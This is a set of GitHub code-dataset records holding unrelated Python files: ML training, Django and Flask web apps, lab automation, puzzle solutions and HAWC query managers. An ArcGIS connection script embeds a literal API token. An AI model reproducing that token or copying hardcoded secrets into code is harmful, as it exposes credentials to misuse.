parser.add_argument('--num-neg', type=int, default=5)\r\n    parser.add_argument('--resume', action='store_true', default=False)\r\n    parser.add_argument('--test', action='store_true', default=False)\r\n    parser.add_argument('--n-gram', type=int, default=1)\r\n    parser.add_argument('--transfer', action='store_true', default=False)\r\n    parser.add_argument('--base-model', type=str, default='../model/model.pt')\r\n    parser.add_argument('--save-model', type=str, default='../model/hybrid.pt')\r\n    parser.add_argument('--load-model', type=str, default='../model/hybrid.pt')\r\n    parser.add_argument('--lowercase', action='store_true', default=False)\r\n    parser.add_argument('--self-attn', action='store_true', default=True)\r\n    parser.add_argument('--log-file', type=str, default = '../log/log_file.log')\r\n    parser.add_argument('--pre-negscore', type=str, default=None)\r\n\r\n\r\n    args = parser.parse_args()\r\n    args.cuda = not args.no_cuda and torch.cuda.is_available()\r\n\r\n    logger.setLevel(logging.INFO)\r\n    fmt = logging.Formatter('%(asctime)s: [ %(message)s ]',\r\n                            '%m/%d/%Y %I:%M:%S %p')\r\n    console = logging.StreamHandler()\r\n    console.setFormatter(fmt)\r\n    logger.addHandler(console)\r\n    logfile = logging.FileHandler(args.log_file, 'a')\r\n\r\n    logfile.setFormatter(fmt)\r\n    logger.addHandler(logfile)\r\n\r\n    train_exs = load_data_train(args.train_file, args.lowercase, args.pre_negscore)\r\n    dev_exs = load_data(args.dev_file, args.lowercase)\r\n    #vocab_dict 
= voc, char2ind, ind2char\r\n #pickle.dump(vocab_dict, open('../trained_model/vocab.pkl', 'wb'))\r\n #exit()\r\n\r\n if args.transfer:\r\n logger.info('transfer learning')\r\n voc, char2ind, ind2char = pickle.load(open('../trained_model/vocab.pkl', 'rb'))\r\n model = torch.load(args.base_model)\r\n else:\r\n voc, char2ind, ind2char = load_words(train_exs + dev_exs, args.n_gram)\r\n vocab_dict = voc, char2ind, ind2char\r\n #pickle.dump(vocab_dict, open('../trained_model/pre_trained/vocab_movie.pkl', 'wb'))\r\n #exit()\r\n model = Hybrid_Alias_Sim(args, voc)\r\n\r\n\r\n if args.resume:\r\n logger.info('use previous model')\r\n model = torch.load(args.load_model)\r\n \r\n device = torch.device(\"cuda\" if args.cuda else \"cpu\")\r\n model.to(device)\r\n #logger.info(model)\r\n\r\n if args.test:\r\n test_exs = load_data(args.test_file, args.lowercase)\r\n test_dataset = dataset_hybrid.AliasDataset(test_exs, ind2char, voc, char2ind, args.n_gram, args.num_neg)\r\n test_sampler = torch.utils.data.sampler.SequentialSampler(test_dataset)\r\n test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=args.batch_size,\r\n sampler=test_sampler, num_workers=args.data_workers,\r\n collate_fn=dataset_hybrid.val_batchify, pin_memory=args.cuda)\r\n precision_recall(args, test_loader, model, device, ind2char)\r\n #error_analysis(args, test_loader, model, device, ind2char)\r\n\r\n exit()\r\n \r\n #train_vec_rep = train_vec(train_exs, char2ind)\r\n #train_vec_rep = pickle.load(open('train_vec.pt', 'rb'))\r\n\r\n\r\n train_dataset = dataset_hybrid.AliasDataset(train_exs, ind2char, voc, char2ind, args.n_gram, args.num_neg)\r\n train_sampler = torch.utils.data.sampler.RandomSampler(train_dataset)\r\n\r\n dev_dataset = dataset_hybrid.AliasDataset(dev_exs[:1000], ind2char, voc, char2ind, args.n_gram, args.num_neg)\r\n dev_sampler = torch.utils.data.sampler.SequentialSampler(dev_dataset)\r\n dev_loader = torch.utils.data.DataLoader(dev_dataset, batch_size=args.batch_size,\r\n sampler=dev_sampler, num_workers=args.data_workers,\r\n collate_fn=dataset_hybrid.val_batchify, pin_memory=args.cuda)\r\n \r\n start_epoch = 0\r\n logger.info('start training:')\r\n best_mrr = 0\r\n \r\n for epoch in range(start_epoch, args.num_epochs):\r\n logger.info('start epoch:%d' % epoch)\r\n train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=args.batch_size,\r\n sampler=train_sampler, num_workers=args.data_workers,\r\n collate_fn=dataset_hybrid.train_batchify, pin_memory=args.cuda)\r\n best_mrr = train(args, train_loader, dev_loader, model, device, best_mrr)\r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"henryzhao5852/AutoEM","sub_path":"matching/hybrid_train.py","file_name":"hybrid_train.py","file_ext":"py","file_size_in_byte":31224,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"72"} +{"seq_id":"10488938588","text":"from django.db import models\nfrom django.contrib.contenttypes.fields import GenericForeignKey\nfrom django.contrib.contenttypes.models import ContentType\n\nfrom mptt.models import MPTTModel, TreeForeignKey\n\nfrom django.contrib.auth.models import User\nfrom account.models import Profile\n# from about.models import AboutPost\n\nclass Comment(MPTTModel):\n # about_post = models.ForeignKey(\n # AboutPost,\n # related_name='comments',\n # on_delete=models.CASCADE\n # )\n content_type = models.ForeignKey(ContentType, blank=True, null=True, on_delete=models.SET_NULL)\n object_id = 
models.PositiveIntegerField(blank=True, null=True)\n    content_object = GenericForeignKey('content_type', 'object_id')\n    commentor = models.ForeignKey(\n        Profile,\n        on_delete=models.PROTECT,\n        null=True,\n        related_name='user_comment'\n    )\n    parent = TreeForeignKey(\n        'self',\n        on_delete=models.CASCADE,\n        blank=True, null=True,\n        related_name='child'\n    )\n    body = models.TextField()\n    created = models.DateTimeField(auto_now_add=True)\n    updated = models.DateTimeField(auto_now=True)\n    active = models.BooleanField(default=True)\n    users_like = models.ManyToManyField(\n        User,\n        related_name='comment_liked',\n        blank=True\n    )\n    total_likes = models.PositiveIntegerField(\n        db_index=True,\n        default=0\n    )\n    \n    class MPTTMeta:\n        order_insertion_by = ['publish']\n\n    def __str__(self):\n        return self.body[:20]\n\n","repo_name":"vizvasrj/MultiAuthorBlog","sub_path":"comment/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"14473060021","text":"from ..Experiment import reagents, clock, logging\nfrom ..Experiment.concentration import Concentration\nfrom .QSetup import QSetup\nfrom .TRP import TRP\nfrom . import trplayout\n\nreagents.add(\"BT5310\", well=\"D1\", conc=Concentration(20, 20, \"pM\"))\nreagents.add(\"MKapa\", well='A1', conc=Concentration(2.5, 1, 'x'), extraVol=30,\n             ingredients={'glycerol': 1, 'Water': 39})\nreagents.add(\"P-End\", well=\"C1\", conc=4)\n\n\nclass IDPrep(TRP):\n    # Barcode multiple samples\n    pcreff = 1.98\n\n    def __init__(self, inputs):\n        super(IDPrep, self).__init__()\n        self.inputs = inputs\n\n        self.qconc = 0.020  # Target qPCR concentration in nM\n        self.qprimers = [\"End\"]\n\n        self.bc1_inputvol = 2  # ul into PCR1\n\n        used = []\n        for inp in inputs:\n            bc = \"%s-%s\" % (inp['left'], inp['right'])\n            if bc in used:\n                logging.error(\"Barcode %s is being reused for %s\" % (bc, inp['name']))\n            used.append(bc)\n\n        print(\"used=\",used)\n        self.rsrc = [reagents.add(\"%s-%s-%s\" % (inputs[i]['name'], inputs[i]['left'], inputs[i]['right']),\n                                  trplayout.SAMPLEPLATE,\n                                  well=inputs[i]['well'] if 'well' in inputs[i] else None,\n                                  conc=Concentration(stock=inputs[i]['conc'], units=\"nM\"),\n                                  initVol=self.bc1_inputvol, extraVol=0)\n                     for i in range(len(inputs))]\n        self.q = None  # Defined in pgm()\n\n    def pgm(self):\n        self.q = QSetup(self, maxdil=16, debug=False, mindilvol=60)\n\n        self.q.debug = True\n        self.q.addReferences(dstep=10, primers=self.qprimers, ref=reagents.getsample(\"BT5310\"),nreplicates=2)\n\n        print(\"### Barcoding #### (%.0f min)\" % (clock.elapsed() / 60.0))\n        self.idbarcoding(self.rsrc, left=[x['left'] for x in self.inputs],\n                         right=[x['right'] for x in self.inputs])\n        print(\"### qPCR #### (%.0f min)\" % (clock.elapsed() / 60.0))\n        self.q.run(confirm=False, enzName='EvaGreen')\n\n    def idbarcoding(self, rsrc, left, right):\n        \"\"\"Perform barcoding of the given inputs; rsrc, left, right should all be equal length\"\"\"\n        pcrcycles = [4]  # Don't need 2nd PCR since this will go directly into constriction\n        #pcr1inputconc = 0.05  # PCR1 concentration final in reaction\n        pcr1inputdil = 10\n        pcr1vol = 30\n        pcr1postdil = 100.0 / pcr1vol\n\n        pcr2dil = 50\n        pcr2minvol = 50.0\n\n        samps = [s.getsample() for s in rsrc]\n        print(\"Inputs:\")\n        for i in range(len(samps)):\n            print(\"%2s %-10s %8s-%-8s %.1f%s\" % (\n                samps[i].plate.wellname(samps[i].well), self.inputs[i]['name'], left[i], right[i], samps[i].conc.stock,samps[i].conc.units))\n        # Compute pcr1inputconc 
such that lowest concentration input ends up with at least 30ul after dilution\n pcr1inputconc=min([s.conc.stock*s.volume/30.0/pcr1inputdil for s in samps])\n print(\"Diluting inputs so PCR1 final template conc = %.0f pM\"%(pcr1inputconc*1000))\n wellnum = 5\n for s in left + right:\n primer = \"P-\" + s\n if not reagents.isReagent(primer):\n reagents.add(primer, conc=Concentration(2.67, 0.4, 'uM'), extraVol=30, plate=trplayout.REAGENTPLATE,\n well=trplayout.REAGENTPLATE.wellname(wellnum))\n wellnum += 1\n # Run first pass dilution where needed\n for i in range(len(samps)):\n # Dilute down to desired conc\n dil = samps[i].conc.stock / pcr1inputconc / pcr1inputdil\n dilvol = samps[i].volume * dil\n if dilvol > 100.0:\n logging.notice(\"Dilution of input %s (%.1f ul) by %.2f would require %.1f ul\" % (\n samps[i].name, samps[i].volume, dil, dilvol))\n # Do a first pass dilution into 150ul, then remove enough so second dilution can go into 100ul\n dil1 = 100.0 / samps[i].volume\n self.diluteInPlace(tgt=[samps[i]], dil=dil1)\n print(\"First pass dilution of %s by %.1f/%.1f (conc now %.3f nM)\" % (samps[i].name, dil1, dil, samps[i].conc.stock))\n dil /= dil1\n\n # Make sure they are all mixed\n self.e.shakeSamples(samps)\n\n # Final dilution\n for s in samps:\n # Dilute down to desired conc\n dil = s.conc.stock / pcr1inputconc / pcr1inputdil\n if dil < 1.0:\n logging.error(\"Input %s requires dilution of %.2f\" % (s.name, dil))\n elif dil > 1.0:\n dilvol = s.volume * dil\n if dilvol>100:\n toremove=s.volume-100.0/dil\n print(\"Removing %.1f ul from %s to allow enough room for dilution\"%(toremove,s.name))\n self.e.dispose(toremove, s)\n self.diluteInPlace(tgt=[s], dil=dil)\n print(\"Diluting %s by %.1f\" % (s.name, dil))\n\n pcr1 = self.runPCR(src=samps, srcdil=pcr1inputdil, ncycles=pcrcycles[0], vol=pcr1vol,\n primers=[[left[i], right[i]] for i in range(len(left))], usertime=0, fastCycling=False,\n inPlace=False, master=\"MKapa\", kapa=True)\n\n pcr1finalconc = pcr1inputconc * self.pcreff ** pcrcycles[0]\n print(\"PCR1 output concentration = %.3f nM\" % pcr1finalconc)\n\n if pcr1postdil > 1:\n pcr1finalconc /= pcr1postdil\n print(\"Post dilute PCR1 by %.2fx to %.3f nM \" % (pcr1postdil, pcr1finalconc))\n self.diluteInPlace(tgt=pcr1, dil=pcr1postdil)\n\n for x in pcr1:\n x.conc = Concentration(stock=pcr1finalconc, units='nM')\n\n self.q.addSamples(src=pcr1, needDil=pcr1finalconc / self.qconc, primers=self.qprimers, save=True,\n nreplicates=1)\n\n if len(pcrcycles) > 1:\n # Second PCR with 235p/236p on mixture (use at least 4ul of prior)\n pcr2 = self.runPCR(src=pcr1, srcdil=pcr2dil / pcr1postdil, vol=max(pcr2minvol, pcr2dil / pcr1postdil * 4),\n ncycles=pcrcycles[1],\n primers=\"End\", fastCycling=False, master=\"MKapa\", kapa=True)\n\n pcr2finalconc = min(200, pcr1finalconc / (pcr2dil / pcr1postdil) * self.pcreff ** pcrcycles[1])\n print(\"PCR2 final conc = %.1f nM\" % pcr2finalconc)\n\n d2 = min(4.0, 150.0 / max([p.volume for p in pcr2]))\n if d2 > 1:\n pcr2finalconc /= d2\n print(\"Post-dilute PCR2 by %.1fx to %.3fnM\" % (d2, pcr2finalconc))\n self.diluteInPlace(tgt=pcr2, dil=d2)\n self.e.shakeSamples(pcr2)\n\n for x in pcr2:\n x.conc = Concentration(stock=pcr2finalconc, units='nM')\n\n self.q.addSamples(src=pcr2, needDil=pcr2finalconc / self.qconc, primers=self.qprimers, save=True,\n nreplicates=2)\n res = pcr2\n else:\n res = pcr1\n\n return 
res\n","repo_name":"btownshend/pyTecan","sub_path":"TRPLib/pgmidprep.py","file_name":"pgmidprep.py","file_ext":"py","file_size_in_byte":7096,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"7689224342","text":"from . import main_blueprint\nfrom .forms import ContactForm, AddressForm, Map911Form, MapCrimeForm, MapBuildForm, ViolationsBuildForm\nfrom .utils import *\nfrom flask import render_template, redirect, url_for, current_app, abort, session\n\n\n@main_blueprint.route('/admin')\ndef admin():\n abort(500)\n\n\n@main_blueprint.route(\"/contact\", methods=[\"POST\"])\ndef contact():\n form = ContactForm()\n if form.validate_on_submit():\n sender = form.email.data\n message = form.content.data\n contact_form_email(sender, message)\n return redirect(url_for(session['page']))\n\n\n@main_blueprint.route('/address-reset')\ndef reset():\n session['address'] = ''\n return redirect(url_for('main.index'))\n\n\n@main_blueprint.route('/', methods=['GET', 'POST'])\ndef index():\n session['page'] = 'main.index'\n form = AddressForm()\n if form.validate_on_submit():\n try:\n address = form.address.data + ' Seattle, WA'\n address_lat, address_lon = address_lat_lon(address)\n session['address'] = [float(address_lat), float(address_lon)]\n except IndexError:\n error = \"That is not a valid address\"\n return render_template('index.html', form=form, error=error, active='home')\n print(session)\n try:\n if session['address']:\n data_911 = get_data(endpoints.get('emergency'), last_3days_911)\n data_crime = get_data(endpoints.get('crime'), last_3days_crime)\n data_build = get_data(endpoints.get('build'), last_3k_build)\n data_landuse = get_data(endpoints.get('landuse'))\n data_violations = get_data(endpoints.get('violations', last_60days_violations))\n m1 = create_map('Home', 'All Incidents', data_911, create_marker_text_911, incident_type_911,\n location=session['address'], zoom_start=15)\n m2 = create_map('Home', 'All Incidents', data_crime, create_marker_text_crime, incident_type_crime,\n location=session['address'], zoom_start=15)\n m3 = create_map('Home', 'All Incidents', data_build, create_marker_text_build, incident_type_build,\n location=session['address'], zoom_start=15)\n m4 = create_map('Home', 'All Incidents', data_landuse, create_marker_landuse, incident_type_landuse,\n location=session['address'], zoom_start=15)\n m5 = create_map('Home', 'All Incidents', data_violations, create_marker_violations,\n incident_type_violations,\n location=session['address'], zoom_start=15)\n return render_template('index.html', form=form, map1=m1, map2=m2, map3=m3, map4=m4, map5=m5, active='home')\n except KeyError:\n return render_template('index.html', form=form, active='home')\n\n\n@main_blueprint.route('/emergency', methods=['GET', 'POST'])\ndef emergency():\n data_911 = get_data(endpoints.get('emergency', last_3days_911))\n session['page'] = 'main.emergency'\n form = Map911Form()\n generate_911_sunburst(data_911)\n if form.submit.data and form.validate():\n m = create_map(form.neighborhood.data, form.incident.data, data_911, create_marker_text_911,\n incident_type_911)\n m2 = generate_heatmap('Entire City', 'All Incidents', data_911, incident_type_911)\n return render_template('emergency.html', form=form, map=m, map2=m2, active='emergency')\n m = create_map('Entire City', 'All Incidents', data_911, create_marker_text_911, incident_type_911)\n m2 = generate_heatmap('Entire City', 'All Incidents', data_911, incident_type_911)\n return 
render_template('emergency.html', form=form, map=m, map2=m2, active='emergency')\n\n\n@main_blueprint.route('/crime', methods=['GET', 'POST'])\ndef crime():\n    data_crime = get_data(endpoints.get('crime'), last_3days_crime)\n    session['page'] = 'main.crime'\n    form = MapCrimeForm()\n    generate_crime_sunburst(data_crime)\n    if form.submit.data and form.validate():\n        m = create_map(form.neighborhood.data, form.incident_crime.data, data_crime, create_marker_text_crime,\n                       incident_type_crime)\n        m2 = generate_heatmap('Entire City', 'All Incidents', data_crime, incident_type_crime)\n        return render_template('crime.html', form=form, map=m, map2=m2, active='crime')\n    m = create_map('Entire City', 'All Incidents', data_crime, create_marker_text_crime, incident_type_crime)\n    m2 = generate_heatmap('Entire City', 'All Incidents', data_crime, incident_type_crime)\n    return render_template('crime.html', form=form, map=m, map2=m2, active='crime')\n\n\n@main_blueprint.route('/violations', methods=['GET', 'POST'])\ndef violations():\n    data_violations = get_data(endpoints.get('violations'), last_60days_violations)\n    session['page'] = 'main.violations'\n    form = ViolationsBuildForm()\n    if form.submit.data and form.validate():\n        m = create_map(form.neighborhood.data, 'All Incidents', data_violations, create_marker_violations,\n                       incident_type_violations)\n        return render_template('violations.html', form=form, map=m, active='violations')\n    m = create_map('Entire City', 'All Incidents', data_violations, create_marker_violations,\n                   incident_type_violations)\n    return render_template('violations.html', form=form, map=m, active='violations')\n\n\n@main_blueprint.route('/build', methods=['GET', 'POST'])\ndef build():\n    data_build = get_data(endpoints.get('build'), last_3k_build)\n    data_landuse = get_data(endpoints.get('landuse'))\n    session['page'] = 'main.build'\n    form = MapBuildForm()\n    generate_build_sunburst(data_build)\n    if form.submit.data and form.validate():\n        m = create_map(form.neighborhood.data, form.incident_build.data, data_build, create_marker_text_build,\n                       incident_type_build)\n        m3 = create_map(form.neighborhood.data, 'All Incidents', data_landuse, create_marker_landuse,\n                        incident_type_landuse)\n        m2 = generate_heatmap('Entire City', 'All Incidents', data_build, incident_type_build)\n        return render_template('build.html', form=form, map=m, map2=m2, map3=m3, active='build')\n    m = create_map('Entire City', 'All Incidents', data_build, create_marker_text_build, incident_type_build)\n    m3 = create_map('Entire City', 'All Incidents', data_landuse, create_marker_landuse,\n                    incident_type_landuse)\n    m2 = generate_heatmap('Entire City', 'All Incidents', data_build, incident_type_build)\n    return render_template('build.html', form=form, map=m, map2=m2, map3=m3, active='build')\n","repo_name":"noele952/seattle-data-final","sub_path":"app/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"13628660854","text":"from distutils.command.upload import upload\r\nfrom django.db import models\r\nfrom .validators import validate_file_size\r\n\r\n\r\n\r\n# Create your models here.\r\nclass Profile(models.Model):\r\n    name = models.TextField(\r\n        verbose_name='Name'\r\n    )\r\n    description = models.TextField(\r\n        verbose_name='Description', max_length=140\r\n    )\r\n    get_image = models.ImageField(\r\n        verbose_name='Image', upload_to='pictures/%Y/%m/%d/',\r\n        validators=[validate_file_size] \r\n    )\r\n    
price = models.PositiveIntegerField(\r\n        verbose_name='Price'\r\n    )\r\n\r\n    def __str__(self):\r\n        return f'#{self.name}'\r\n\r\n    class Meta:\r\n        verbose_name = 'Dish'\r\n        verbose_name_plural = 'Dishes'\r\n","repo_name":"Nuggetsik/bot_telegram","sub_path":"admin_backend/tga/ugc/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"4990406608","text":"import re\nimport functools\nfrom common import Input\nimport itertools\n\n\ndef parse_instructions(instruction_set, instructions):\n    parsed = []\n    for line in instructions:\n        m = re.match(r'(\\w\\w\\w) (-?\\d+|\\w) ?(-?\\d+|\\w)?$', line)\n        if not m:\n            print(line)\n        inst, *args = m.groups()\n        args = [a for a in args if a is not None]\n        if inst not in instruction_set:\n            raise ValueError('instruction {} not found'.format(inst))\n        parsed.append([inst, args])\n    return parsed\n\n\ndef execute(register, instruction_set, instructions):\n    instructions = parse_instructions(instruction_set, instructions)\n    while register['i'] < len(instructions):\n        # print(register)\n        inst, args = instructions[register['i']]\n        # print(inst, *args)\n        try:\n            if inst == 'tgl':\n                instruction_set[inst](*args, instructions, register['i'])\n            elif inst == 'out':\n                yield from instruction_set[inst](*args)\n            else:\n                instruction_set[inst](*args)\n        except TypeError:\n            pass\n        register['i'] += 1\n    return register\n\n\ndef resolve(reg):\n    try:\n        return int(reg)\n    except ValueError:\n        return register[reg]\n\n\ndef verify(output, registers):\n    verification_data = itertools.cycle((0, 1))\n    recording = set()\n    for i, (v, o) in enumerate(zip(verification_data, output)):\n        if v != o:\n            return False\n        state = (serialize(registers), o)\n        if state in recording and len(recording) >= 10:\n            return True\n        recording.add(state)\n    return False\n\n\ndef serialize(registers):\n    return tuple(registers.items())\n\n\nif __name__ == '__main__':\n\n    def cpy(x, y):\n        register[y] = resolve(x)\n\n    def inc(x):\n        register[x] += 1\n\n    def dec(x):\n        register[x] -= 1\n\n    def jnz(x, y):\n        register['i'] += resolve(y) - 1 if resolve(x) != 0 else 0\n\n    def tgl(x, instructions, self_index):\n        index = register['i'] + resolve(x)\n        inst, args = instructions[index]\n\n        if inst == 'inc':\n            inst = 'dec'\n        elif len(args) == 1:\n            inst = 'inc'\n\n        if inst == 'jnz':\n            inst = 'cpy'\n        elif len(args) == 2:\n            inst = 'jnz'\n        # print(instructions[index], ' at ', index, ' changed to ', [inst, args])\n        instructions[index] = [inst, args]\n\n    def out(x):\n        yield resolve(x)\n\n    instruction_set = {\n        'cpy': cpy,\n        'inc': inc,\n        'dec': dec,\n        'jnz': jnz,\n        'tgl': tgl,\n        'out': out,\n    }\n\n    a = 0\n    while True:\n        register = {\n            'a': a,\n            'b': 0,\n            'c': 0,\n            'd': 0,\n            'i': 0,\n        }\n\n        if verify(execute(register, instruction_set, Input(25)), register):\n            print('DONE: ', a)\n            break\n        a += 1\n","repo_name":"Laharah/advent_of_code","sub_path":"2016/day25.py","file_name":"day25.py","file_ext":"py","file_size_in_byte":2914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"17367629140","text":"# Leetcode\n# 227. 
Basic Calculator II\n# https://leetcode.com/problems/basic-calculator-ii/solutions/3227668/227-time-91-15-solution-with-step-by-step-explanation/\n\n\nclass Solution:\n def calculate(self, s: str) -> int:\n stack = []\n operator = \"+\"\n current = 0\n for char in s+\"+\": # adding the + in the end because the last num in s will be added when an operator is found.\n if char.isdigit():\n current = current*10+int(char) # for consecutive digits. For eg. 98 => 9x10 + 8 = 98\n elif char in [\"+\", \"-\", \"*\", \"/\"]:\n if operator == \"+\":\n stack.append(current)\n elif operator == \"-\":\n stack.append(-current)\n elif operator == \"*\":\n stack.append(stack.pop() * current)\n elif operator == \"/\":\n stack.append(int(stack.pop()/current))\n operator = char\n current = 0\n return sum(stack)\n","repo_name":"ayeshsalah/coding-interview-prep","sub_path":"leetcode/227_BasicCalculatorII.py","file_name":"227_BasicCalculatorII.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1441188242","text":"#Script to connect to an ArcGIS Server and get the list of services\n#and their properties\n\nimport sys\nimport arcgis\n\n#Connect to the ArcGIS Server\nprint(\"Connecting to ArcGIS Server...\")\napi_token = 'AAPKc1d344f69e094823862ef2f539973a3a2IW8P-P5JdXF1-4JsmVMr3XpfuefE7HOTc8Ju6DjIK2yKKowGhUH8Y1Pw1dwWaMU'\n\ngis = arcgis.GIS(\"https://www.arcgis.com\", api_token)\n\n#Connect to franklin county gis server\ngis = arcgis.GIS(\"https://gis.franklincountyohio.gov/arcgis/rest/services\", api_token)\n\n#Get the list of services\nservices = gis.services\nprint(services)\n","repo_name":"MattchewMoar/homepage","sub_path":"home/static/home/scripts/gis.py","file_name":"gis.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24906636678","text":"import json\nfrom datetime import datetime, timedelta\nfrom typing import Any, NamedTuple\n\nimport pandas as pd\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.db.models import Case, Q, QuerySet, Value, When\nfrom reversion.models import Version\n\nfrom ..common.helper import HAWCDjangoJSONEncoder, map_enum\nfrom ..common.models import BaseManager, replace_null, str_m2m\nfrom . 
import constants\n\n\ndef published(prefix: str = \"\") -> Case:\n public = f\"{prefix}public_on__isnull\"\n hidden = f\"{prefix}hide_from_public_page\"\n return Case(\n When(**{public: True}, then=Value(constants.PublishedStatus.PRIVATE)),\n When(\n Q(**{public: False}) & Q(**{hidden: False}),\n then=Value(constants.PublishedStatus.PUBLIC),\n ),\n When(\n Q(**{public: False}) & Q(**{hidden: True}),\n then=Value(constants.PublishedStatus.UNLISTED),\n ),\n default=Value(\"???\"),\n )\n\n\nclass AssessmentQuerySet(QuerySet):\n def public(self):\n return self.filter(public_on__isnull=False, hide_from_public_page=False)\n\n def user_can_view(self, user, exclusion_id=None, public=False):\n \"\"\"\n Return queryset of all assessments which that user is able to view,\n optionally excluding assessment exclusion_id,\n not including public assessments\n \"\"\"\n filters = (\n Q(project_manager=user) | Q(team_members=user) | Q(reviewers=user)\n if user.is_authenticated\n else Q(pk__in=[])\n )\n if public:\n filters |= Q(public_on__isnull=False) & Q(hide_from_public_page=False)\n return self.filter(filters).exclude(id=exclusion_id).distinct()\n\n def recent_public(self, n: int = 5) -> QuerySet:\n \"\"\"Get recent public, published assessments\n\n Args:\n n (int, optional): Number of assessments; defaults to 5.\n\n Returns:\n models.QuerySet: An assessment queryset\n \"\"\"\n return self.filter(public_on__isnull=False, hide_from_public_page=False).order_by(\n \"-public_on\"\n )[:n]\n\n def with_published(self) -> QuerySet:\n return self.annotate(published=published())\n\n def with_role(self, user) -> QuerySet:\n return self.annotate(\n user_role=Case(\n When(project_manager=user, then=Value(constants.AssessmentRole.PROJECT_MANAGER)),\n When(team_members=user, then=Value(constants.AssessmentRole.TEAM_MEMBER)),\n When(reviewers=user, then=Value(constants.AssessmentRole.REVIEWER)),\n default=Value(constants.AssessmentRole.NO_ROLE),\n )\n )\n\n def global_chemical_report(self) -> pd.DataFrame:\n mapping = {\n \"id\": \"id\",\n \"name\": \"name\",\n \"year\": \"year\",\n \"assessment_objective\": \"assessment_objective\",\n \"creator_email\": replace_null(\"creator__email\"),\n \"cas\": \"cas\",\n \"dtxsids\": \"dtxsids_str\",\n \"published\": \"published\",\n \"public_on\": \"public_on\",\n \"hide_from_public_page\": \"hide_from_public_page\",\n \"created\": \"created\",\n \"last_updated\": \"last_updated\",\n }\n data = (\n self.with_published()\n .annotate(dtxsids_str=str_m2m(\"dtxsids__dtxsid\"))\n .values_list(*list(mapping.values()))\n )\n return pd.DataFrame(data=data, columns=list(mapping.keys()))\n\n\nclass AssessmentManager(BaseManager):\n assessment_relation = \"id\"\n\n def get_queryset(self):\n return AssessmentQuerySet(self.model, using=self._db)\n\n\nclass AttachmentManager(BaseManager):\n def get_attachments(self, obj, public_only: bool):\n filters = {\n \"content_type\": ContentType.objects.get_for_model(obj),\n \"object_id\": obj.id,\n }\n if public_only:\n filters[\"publicly_available\"] = True\n return self.filter(**filters)\n\n def assessment_qs(self, assessment_id):\n a = ContentType.objects.get(app_label=\"assessment\", model=\"assessment\").id\n return self.filter(content_type=a, object_id=assessment_id)\n\n\nclass DoseUnitManager(BaseManager):\n def assessment_qs(self, assessment_id):\n return self.all()\n\n def json_all(self):\n return json.dumps(list(self.all().values()), cls=HAWCDjangoJSONEncoder)\n\n def get_animal_units(self, assessment):\n \"\"\"\n Returns a queryset of all 
bioassay DoseUnits used in an assessment.\n \"\"\"\n return (\n self.filter(\n dosegroup__dose_regime__dosed_animals__experiment__study__assessment=assessment\n )\n .order_by(\"pk\")\n .distinct(\"pk\")\n )\n\n def get_animal_units_names(self, assessment):\n \"\"\"\n Returns a list of the dose-units which are used in the selected\n assessment for animal bioassay data.\n \"\"\"\n return self.get_animal_units(assessment).values_list(\"name\", flat=True)\n\n def get_iv_units(self, assessment_id: int):\n return (\n self.filter(ivexperiments__study__assessment=assessment_id)\n .order_by(\"id\")\n .distinct(\"id\")\n )\n\n def get_epi_units(self, assessment_id: int):\n return (\n self.filter(exposure__study_population__study__assessment_id=assessment_id)\n .order_by(\"pk\")\n .distinct(\"pk\")\n )\n\n\nclass SpeciesManager(BaseManager):\n def assessment_qs(self, assessment_id):\n return self.all()\n\n\nclass StrainManager(BaseManager):\n def assessment_qs(self, assessment_id):\n return self.all()\n\n\nclass EffectTagManager(BaseManager):\n assessment_relation = \"baseendpoint__assessment\"\n\n def assessment_qs(self, assessment_id):\n return self.filter(baseendpoint__assessment_id=assessment_id).distinct()\n\n def get_choices(self, assessment_id):\n return self.get_qs(assessment_id).values_list(\"id\", \"name\").order_by(\"name\")\n\n\nclass BaseEndpointManager(BaseManager):\n assessment_relation = \"assessment\"\n\n\nclass TimeSpentEditingManager(BaseManager):\n assessment_relation = \"assessment\"\n\n\nclass DatasetManager(BaseManager):\n assessment_relation = \"assessment\"\n\n\nclass AssessmentValueManager(BaseManager):\n assessment_relation = \"assessment\"\n\n def get_df(self) -> pd.DataFrame:\n \"\"\"Get a dataframe of Assessment Values from given Queryset of Values.\"\"\"\n mapping: dict[str, str] = {\n \"assessment_id\": \"assessment_id\",\n \"assessment__name\": \"assessment_name\",\n \"assessment__created\": \"assessment_created\",\n \"assessment__last_updated\": \"assessment_last_updated\",\n \"assessment__details__project_type\": \"project_type\",\n \"assessment__details__project_status\": \"project_status\",\n \"assessment__details__project_url\": \"project_url\",\n \"assessment__details__peer_review_status\": \"peer_review_status\",\n \"assessment__details__qa_id\": \"qa_id\",\n \"assessment__details__qa_url\": \"qa_url\",\n \"assessment__details__report_id\": \"report_id\",\n \"assessment__details__report_url\": \"report_url\",\n \"assessment__details__extra\": \"assessment_extra\",\n \"evaluation_type\": \"evaluation_type\",\n \"id\": \"value_id\",\n \"system\": \"system\",\n \"value_type\": \"value_type\",\n \"value\": \"value\",\n \"value_unit\": \"value_unit\",\n \"basis\": \"basis\",\n \"pod_value\": \"pod_value\",\n \"pod_unit\": \"pod_unit\",\n \"species_studied\": \"species_studied\",\n \"duration\": \"duration\",\n \"study_id\": \"study_id\",\n \"study__short_citation\": \"study_citation\",\n \"confidence\": \"confidence\",\n 